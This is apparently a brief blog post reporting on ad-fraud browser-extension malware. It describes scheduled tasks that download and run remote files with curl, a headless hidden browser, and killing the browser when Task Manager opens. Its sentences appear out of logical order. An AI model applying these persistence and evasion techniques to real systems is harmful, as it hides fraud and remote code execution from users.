![]() The tasks were set to run every 9 minutes after a user logged into their account. The most concerning pair tasks created would use curl to download files from the original website that delivered the malicious script, and then execute whatever it downloaded. ![]() A separate scheduled task, set to run every 9 minutes, would then restart the browser and extension. Even if you noticed your system acting a bit laggy and went to check for a problem, you wouldn't find one. ![]() For example, one would monitor the active tasks on a PC and kill the browser and extension being used for ad fraud any time Task Manager was opened. The scheduled tasks also ran a handful of other scripts that served a few different purposes. ![]() At this time, the group that discovered the malware thinks the primary purpose of the extension was ad fraud, rather than anything more sinister. The browser extension was then run in a "headless" browser window in the background, effectively hiding it from the user. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |